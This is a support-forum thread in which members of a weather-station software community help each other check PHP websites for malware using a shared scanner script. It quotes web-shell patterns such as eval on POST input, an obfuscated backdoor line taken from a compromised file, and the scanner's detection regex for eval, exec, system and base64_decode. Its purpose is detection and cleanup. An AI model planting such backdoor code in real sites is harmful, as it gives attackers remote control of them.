Welcome to the Cumulus Support forum.

Latest Cumulus MX V3 release 3.28.6 (build 3283) - 21 March 2024

Cumulus MX V4 beta test release 4.0.0 (build 4017) - 17 March 2024

Legacy Cumulus 1 release v1.9.4 (build 1099) - 28 November 2014 (a patch is available for 1.9.4 build 1099 that extends the date range of drop-down menus to 2030)

Download the Software (Cumulus MX / Cumulus 1 and other related items) from the Wiki

Website hacked

Other discussion about creating web sites for Cumulus that doesn't have a specific subforum

Moderator: daj

User avatar
rogerthn
Posts: 489
Joined: Thu 11 Apr 2013 6:31 pm
Weather Station: Ecowitt GW1000/GW1003
Operating System: Raspberry Pi OS bullseye aarch64
Location: Trollhättan Sweden
Contact:

Re: Website hacked

Post by rogerthn »

saratogaWX wrote: Fri 30 Apr 2021 9:30 pm I've sent a PM with a link to a tool I developed to spot malware on PHP sites.

Best regards,
Ken

p.s. I've used this to help disinfect about 10 sites for folks so far.
May I please also have that link?
Image
User avatar
saratogaWX
Posts: 1170
Joined: Wed 06 May 2009 5:02 am
Weather Station: Davis Vantage Pro Plus
Operating System: Windows 10 Professional
Location: Saratoga, CA, USA
Contact:

Re: Website hacked

Post by saratogaWX »

Sure.. PM sent.
water01
Posts: 3215
Joined: Sat 13 Aug 2011 9:33 am
Weather Station: Ecowitt HP2551
Operating System: Windows 10 64bit
Location: Burnham-on-Sea
Contact:

Re: Website hacked

Post by water01 »

Could I also have It? Or perhaps we can make it part of the Wiki?
David
Image
User avatar
saratogaWX
Posts: 1170
Joined: Wed 06 May 2009 5:02 am
Weather Station: Davis Vantage Pro Plus
Operating System: Windows 10 Professional
Location: Saratoga, CA, USA
Contact:

Re: Website hacked

Post by saratogaWX »

Sure, I guess it's not really a secret.

https://saratoga-weather.org/chk-files.php?sce=view

Place in the document root of your website. It will scan all .php and .htaccess files looking for possibly malicious content.

It will flag (based on a regex) things that look like constructed functions $functionname(), exec(), system(), eval(), base64_decode(), $_POST usage. It can flag harmless instances too, so it's important to sanity check the output.. there can be a lot of false-positives.
User avatar
rogerthn
Posts: 489
Joined: Thu 11 Apr 2013 6:31 pm
Weather Station: Ecowitt GW1000/GW1003
Operating System: Raspberry Pi OS bullseye aarch64
Location: Trollhättan Sweden
Contact:

Re: Website hacked

Post by rogerthn »

Thanks!
Is this what to look for

Code: Select all

5 instances of ....
Image
User avatar
saratogaWX
Posts: 1170
Joined: Wed 06 May 2009 5:02 am
Weather Station: Davis Vantage Pro Plus
Operating System: Windows 10 Professional
Location: Saratoga, CA, USA
Contact:

Re: Website hacked

Post by saratogaWX »

That just shows the count of 'hits' that the regex found that deserve looking at.

Each 'hit' is shown above with the matching part in red. You have to examine it and determine if it's possibly malicious.

Things that look like
eval($_POST['a']) or
eval(bin64_decode($_POST['a']))
are obviously bad.
As is something like
./data.php Created=20-Dec-2020 14:47:46 GMT Modified=20-Dec-2020 14:47:46 GMT size=184 bytes.
3 (count($b) == 8)?(($ij = $b[58].$b[88]) && ($qc = $ij($b[23].$b[42])) && ($_qc = $ij($b[65].$b[27])) && ($_qc = $qc($b[95], $_qc($ij($b[22])))) && @$_qc()) : $b;
(the $variable() functions are a give away that something untoward is happening)

Sometimes, a flagged entry happens inside a comment (// or # or /*...*/) so looks bad, but is not really executed, and so not harmful.

That's why, the results found by the script have to be sanity checked as the filter is cast quite wide.
User avatar
PaulMy
Posts: 3775
Joined: Sun 28 Sep 2008 11:54 pm
Weather Station: Davis VP2 Plus 24-Hour FARS
Operating System: Windows8 and Windows10
Location: Komoka, ON Canada
Contact:

Re: Website hacked

Post by PaulMy »

Hi Ken,
I have run the script but not sure what to make of the results:

Code: Select all

Match pattern used is '/(.x3D|chr\(61\)|eval\s*\(|@eval\s*\(|\s+base64_decode\s*\(|addtype|addhandler|RewriteRule|RewriteCond|\s+exec\s*\(|@exec\s*\(|\s+system\s*\(|@system\s*\(|\s+passthru\s*\(|@passthru\s*\(|\s+[@]{0,1]assert\s*\(|\s+assert_options\s*\(|\$_POST\[|=\s*\$[a-z0-9A-Z\_]+\s*\()/i'

   ./saratoga-malwarescanner3.php Created=02-May-2021 19:25:14 GMT Modified=02-May-2021 19:25:14 GMT size=7426 bytes.
28	  $toFind = '.x3D|chr\(61\)|eval\s*\(|@eval\s*\(|\s+base64_decode\s*\(|addtype|addhandler|RewriteRule|RewriteCond|\s+exec\s*\(|@exec\s*\(|\s+system\s*\(|@system\s*\(|\s+passthru\s*\(|@passthru\s*\(|\s+[@]{0,1]assert\s*\(|\s+assert_options\s*\(|\$_POST\[|=\s*\$[a-z0-9A-Z\_]+\s*\(';
   ./jpgraph/jpgraph_utils.inc.php Created=22-Mar-2021 02:35:45 GMT Modified=22-Mar-2021 02:35:45 GMT size=25399 bytes.
37	  @eval($t);
   ./jpgraph/jpgraph_legend.inc.php Created=22-Mar-2021 02:35:43 GMT Modified=22-Mar-2021 02:35:43 GMT size=18105 bytes.
212	  //echo "h=$h ({$this->mark_abs_vsize},{$this->ymargin})<br />";
7 instances of '.x3D|chr\(61\)|eval\s*\(|@eval\s*\(|\s+base64_decode\s*\(|addtype|addhandler|RewriteRule|RewriteCond|\s+exec\s*\(|@exec\s*\(|\s+system\s*\(|@system\s*\(|\s+passthru\s*\(|@passthru\s*\(|\s+[@]{0,1]assert\s*\(|\s+assert_options\s*\(|\$_POST\[|=\s*\$[a-z0-9A-Z\_]+\s*\(' found in 3 '.php;.htaccess;' files using 2.985 secs.
I have compared the two files in DiffMerge and the website files are identical to the files in the template download unzipped files, so appears no changes made to the files while on the webserver.

Should I be concerned or need to take any action?

Thanks,
Paul
Davis Vantage Pro2+
C1 www.komokaweather.com/komokaweather-ca
MX www.komokaweather.com/cumulusmx/index.htm /index.html /index.php
MX www.komokaweather.com/cumulusmxwll/index.htm /index.html /index.php
MX www. komokaweather.com/cumulusmx4/index.htm

Image
User avatar
saratogaWX
Posts: 1170
Joined: Wed 06 May 2009 5:02 am
Weather Station: Davis Vantage Pro Plus
Operating System: Windows 10 Professional
Location: Saratoga, CA, USA
Contact:

Re: Website hacked

Post by saratogaWX »

So, of the one's displayed, only

Code: Select all

   ./jpgraph/jpgraph_utils.inc.php Created=22-Mar-2021 02:35:45 GMT Modified=22-Mar-2021 02:35:45 GMT size=25399 bytes.
37	  @eval($t);
caught my eye. You should take a look in jpgraph_utils.inc.php for how $t is set by the code. If it comes from an argument ($_GET/$_POST/$_REQUEST) directly without 'sanitation', then it's a big problem. If $t is constructed without using any of the above, it's likely benign.
Post Reply